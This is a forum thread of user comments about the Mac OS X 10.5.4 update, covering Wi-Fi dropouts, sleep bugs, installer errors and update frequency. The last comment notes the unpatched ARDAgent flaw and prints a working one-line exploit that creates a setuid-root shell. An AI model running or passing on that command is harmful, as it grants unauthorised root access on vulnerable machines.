Reboot time...

I've been putting off my reboot for a few days because I'm transferring some (legal) Torrents.

Had a weird issue with 10.5.3 after Yahoo Messenger crashed -- it wouldn't fully quit, nor would any other apps afterward. Even a kill -09 pid didn't solve it. Fortunately this is an isolated incident... so far.

Hey mate, are you sure you're not having non-OS related issues... like the wrong channel on the b/g radio causing drop-outs?

I'm not the OP, but... The updater's notes specifically mention the 5GHz channel; so no. As far as I can tell, there is no option (at least if you're running WPA2) to select a 5GHz channel using Airport Admin.

We're running a Airport Extreme 802.11n only, 5GHz, WPA2 network at home. My Macbook Pro doesn't seem to have the dropout issue, but both my wife's Macbook and my daughter's Macbook Pro (both are newer than my laptop) get these random periods where their wifi transfer rate basically drops to zero, even with a good signal. Turning the computer's Airport off, and then turning it back on, fixes it.

10.5.4 hasnt fixed my Airport drop-outs again :(

Seems odd that only your MBP has Airport dropout problems. Maybe there are issues with the keychain or with some other preferences. I had an issue where it would connect DHCP but not with any encryption method. Fixed with a visit to the Apple Store genius bar.

I hope this fixes the issue I had with my MacBook going to sleep. It only goes if I tell it to. I have it set to go to sleep after 30 min. of inactivity but it never does; the screen just turns off. Anyone else have this problem in .3? The only programs I usually have open are Mail and Firefox.

Yeah, I have this problem a lot, it just won't go to sleep. One time I did a full on shut down but could still hear the hard drive spinning away, after a minute of that I just unplugged the battery from my Macbook.

I used to have that occasionally happen with iTunes if my old Firewire iPod was plugged in (hasn't happened since I got a Touch). iTunes would not quit, and could not be killed. Looking through the system log, it appeared to be an issue with the Firewire bus (and Google showed similar complaints from some other Leopard users). So did you have any Firewire peripherals plugged in when this happens?

Every 2 months or so

I'm new to the Mac OS (got my first mac last year) but does Apple release so many updates normally? I mean Leopard hasn't been out a full year and there are already 4 updates, with another one coming on the 11th. Everything on preferences is still .mac and still with 10gb of storage, so they have to come out with another update, making it 5.

Apple on average tends to update the OS every 6-8 weeks (2 months) unless they have something new to introduce. In this case, they are introducing Mobile Me by next weekend and the "push" syncing requires this update in Leopard.

Obviously, Apple is taking advantage of making this update and added several bug fixes and updates to other parts of the system that they didn't include in hte precious revision. (10.5.3)

The interesting thing will be when Snow Leopard appears since it appears that it is Intel only;

1.- Will Snow Leopard be a free (or low cost) upgrade) to Leopard users?
2.- Will Apple continue to update Leopard for Power PC users in parallel?

Based on the experience with the Mac OS 9 to Mac OS X transition, I would expect the new OS to be updated along with the old one until a sufficient number of Leopard users switch to Snow Leopard.

Returing to your question. While the short time between 10.5.3 and 10.5.4 is not normal, it does have a precedence in Mac world.

Update got my fans spinning but all is well.

If this update actually makes Leopard usable (No, it was NOT usable by my standards up to this point) I may consider going back to it. I've got a bootable Leopard partition on my external HDD, just need to clone it to my iBook's HDD. That is, if this update actually fixes everything. (Unlikely.)

What makes Leopard un-usable?! It runs perfectly on my iMac, and has never had a single problem. Maybe you should update your hardware mate.

This is the 4th major update to Leopard, and the 4th time i'm going to have to download the combo update and install it manually because it's the 4th time i've had iSync broken by Apple through Software Update.

I get some minor dock movement then it bombs out.

10.5 brings about **** updates, broken wireless (don't get me started on connecting over 802.1x) and no warnings about low battery (it either goes on standby or turns off just like that). Thanks Apple...

I also had an airport issue that was temporarily fixed by cycling airport off then on. The genius at the Apple Store cleaned up some stuff in the preferences (not sure what) and now it works without any problem. He also suggested resetting the keychain as it sometimes gets cluttered with garbage. Once you reset the keychain it will gradually repopulate itself as you re-enter your passwords. His suggestion for a test was to create a new account, log out of all other accounts, log into the new account and see if it works OK. If so then this points to corrupt files in the other account.

When I download the update on my Mini, It acts as if it's loading then asks if I want to restart. I say yes and then I get:

The update "Mac OS X Update" can't be installed.

The installer could not validate the contents of the
"MacOSXUpd10.5.4Patch" package. Contact the software manufacturer for assistance.

Going to try updating my Macbook Pro to see if it works on that.

Ah the beauty of system caches. If only more people understood... there would be much less complaining in the threads re: software updates.

Exactly.

My iMac downloaded and installed everything in less than 5 minutes...a slightly longer boot process later, all is fine and 10.5.4 is running with no issues so far. GO APPLE!!!

Edit: it was 87.6 Mb for me as well.

Uh, dude... you're using an 1.33GHz iBook? I'm shocked even Tiger runs smoothly on that thing anymore! Newer systems require newer hardware to run properly, that's just the way it goes. I can say with 100% certainty that Leopard runs great on all 7 machines I or my office has purchased in the past 2 years.

87.6Mb here, and i have none of the problems you describe, with airport dropping out etc. Mine is a fresh system though ^^

And having just callibrated my battery, my machine warned me when i had 10 mins left, then warned me again as it was about to safe sleep.

well, my start up time is faster now after updateing. However maybe im noticeing something but, safari seems slower...

sleep issue

I had the really annoying sleep problem... and 5.3 seemed to fix it for me. I haven't had problems with it since. I can put it to sleep, unplug stuff, do whatever, and it doesn't wake with a dark screen. The only wrinkle is that I have lidwake turned off so I have to hit a key to wake it, and if I unplug or plug in any USB or the power cord... it wakes as soon as I open the lid. But at least it doesn't get stuck in the dark screen or "screensaver running in blackout mode" like it used to! The odd time it seems to wake up twice (have to enter password twice to get it awake), but hey - it works!
Hopefully .4 doesn't wreck it again... (.1 and .2 kept wrecking things...)

No fix for the ARDAgent flaw I notice. That's poor for such a vulnerability.

$ osascript -e 'tell app "ARDAgent" to do shell script "cp /bin/ksh /bin/suksh; chmod 4755 /bin/suksh"'; suksh
